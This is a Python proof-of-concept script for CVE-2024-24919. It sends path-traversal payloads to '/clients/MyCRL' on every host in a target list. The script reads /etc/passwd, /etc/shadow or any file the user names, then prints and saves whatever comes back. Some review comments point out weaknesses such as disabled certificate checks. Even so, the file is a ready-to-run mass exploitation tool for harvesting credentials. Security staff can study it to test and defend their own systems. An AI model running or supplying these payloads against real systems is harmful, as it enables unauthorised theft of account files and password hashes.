CVE-2024-24919.py
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style
import random
# Terminal colour and style shortcuts taken from colorama.
green, magenta, cyan = Fore.GREEN, Fore.MAGENTA, Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red, blue, yellow, white = Fore.RED, Fore.BLUE, Fore.YELLOW, Fore.WHITE
reset, bold = Style.RESET_ALL, Style.BRIGHT

# The banner colour is picked once per run from this pool.
colors = [green, cyan, blue]
random_color = random.choice(colors)

# NOTE(review): this silences urllib3's InsecureRequestWarning for the whole
# process, which hides the fact that make_request() sends every request with
# certificate verification turned off (verify=False).
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Substrings whose presence in a response body is taken as evidence that a
# passwd/shadow-style account file was returned.
vuln = ['root:', 'nobody:']
def banner():
    """Return the coloured start-up banner as a single string.

    The text is assembled from the module-level ``bold``, ``random_color``,
    ``white`` and ``reset`` values.
    """
    # NOTE(review): this is a non-raw f-string, so the backslashes in the art
    # are processed as escapes; a backslash that ends a line joins that line
    # with the next one in the rendered output.
    art = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ ____ _ _ ___ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \| || | / _ \/ |/ _ \
| | \ \ / /| _| __) | | | |__) | || |_ _____ __) | || || (_) | | (_) |
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____/ __/|__ _\__, | |\__, |
\____| \_/ |_____| |_____|\___/_____| |_| |_____| |_| /_/|_| /_/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
    return art
# Executed at module load: the banner is printed before main() parses any
# arguments, and also whenever this file is imported.
print(banner())
def make_request(url, payload=None, headers=None):
    """POST ``payload`` to ``url`` and report whether the reply looks like a leaked account file.

    A reply counts as a hit when its status is OK and its body contains any
    marker from the module-level ``vuln`` list.  On a hit the body is printed
    and, when the payload names ``etc/shadow`` or ``etc/passwd``, also written
    to a file called ``shadow`` or ``passwd`` in the current directory.

    Review notes:
      * ``verify=False`` turns off certificate validation, so the identity of
        the answering host is never checked.
      * No ``timeout`` is passed, so an unresponsive host can block the call.
      * The marker test is a plain substring match on the whole body: any
        page that happens to contain ``root:`` is reported as vulnerable, and
        a custom file without either marker is reported as not vulnerable.
      * The output files have fixed names and are opened with mode "w", so
        each hit overwrites the previous one, and the captured credential
        data is stored with the process's default file permissions.

    Args:
        url: Full URL the request is sent to.
        payload: Request body; also inspected to choose the output file.
        headers: HTTP headers passed through to ``requests.post``.

    Returns:
        None. All results are reported on stdout.
    """
    # NOTE(review): the listing lost its indentation; the nesting below is
    # reconstructed from statement order (first matching marker reports and
    # returns, otherwise "not vulnerable" is printed).
    border_top = "╔══════════════════════════════════════════════════════╗"
    border_bottom = "╚══════════════════════════════════════════════════════╝"
    try:
        reply = requests.post(url, data=payload, headers=headers, verify=False)
        if not reply.ok:
            print(f"[-] {url} responded with status code: {reply.status_code}")
            return

        body = reply.text
        if not any(marker in body for marker in vuln):
            print(f"[-] {url} is not vulnerable")
            return

        print(f"[+] {url} is vulnerable")

        # Decide whether the body is also saved to disk, and under which name.
        dump = None
        if payload:
            if "etc/shadow" in payload:
                dump = ("shadow", "║ /etc/shadow found: ║")
            elif "etc/passwd" in payload:
                dump = ("passwd", "║ /etc/passwd found: ║")

        if dump is not None:
            filename, caption = dump
            print(border_top)
            print(caption)
            print(border_bottom)
            with open(filename, "w") as out:
                out.write(body)

        print(border_top)
        print(f" {body} ")
        print(border_bottom)
        print("If you found this useful, consider buying me a coffee:")
        print("https://www.buymeacoffee.com/VeryLazyTech")
        print("@VeryLazyTech")
    except requests.RequestException as e:
        print(f"Error making request to {url}: {e}")
def main():
    """Parse the command line and send the CVE-2024-24919 probes to every listed target.

    ``-l`` names a file with one base URL per line; entries that do not start
    with ``http://`` or ``https://`` are skipped with a message.  ``-f``
    replaces the file requested by the first probe only; the second probe
    always asks for ``etc/shadow``.

    For log review: each target receives two POST requests to
    ``<base>/clients/MyCRL`` whose body starts with ``aCSHELL/`` followed by
    a run of ``../`` segments, sent with the fixed header set built below.

    Returns:
        None. Progress and results are printed by this function and by
        ``make_request``.
    """
    parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - VeryLazyTech")
    parser.add_argument(
        "-l",
        metavar='filename',
        type=str,
        help="File containing list of HTTP/HTTPS targets",
    )
    parser.add_argument(
        "-f",
        metavar='file',
        type=str,
        help="File to read for custom payload (May break on multiple targets with unknown files.)",
    )
    args = parser.parse_args()

    # Two request bodies per target: the first is overridable with -f, the
    # second is fixed.
    payload_base = "aCSHELL/../../../../../../../{}"
    if args.f:
        payload = payload_base.format(args.f)
    else:
        payload = "aCSHELL/../../../../../../../etc/passwd"
    payload2 = "aCSHELL/../../../../../../../etc/shadow"

    # Static browser-like header set sent with every request.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close",
    }

    if not args.l:
        print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
        return

    try:
        with open(args.l, 'r') as listing:
            entries = listing.readlines()
        for entry in entries:
            target = entry.strip()
            if not target.startswith(('http://', 'https://')):
                print(f"Skipping invalid URL: {target}")
                continue
            make_request(target + '/clients/MyCRL', payload=payload, headers=headers)
            make_request(target + '/clients/MyCRL', payload=payload2, headers=headers)
    except FileNotFoundError:
        print(f"Error: File '{args.l}' not found.")
# Start the scan only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()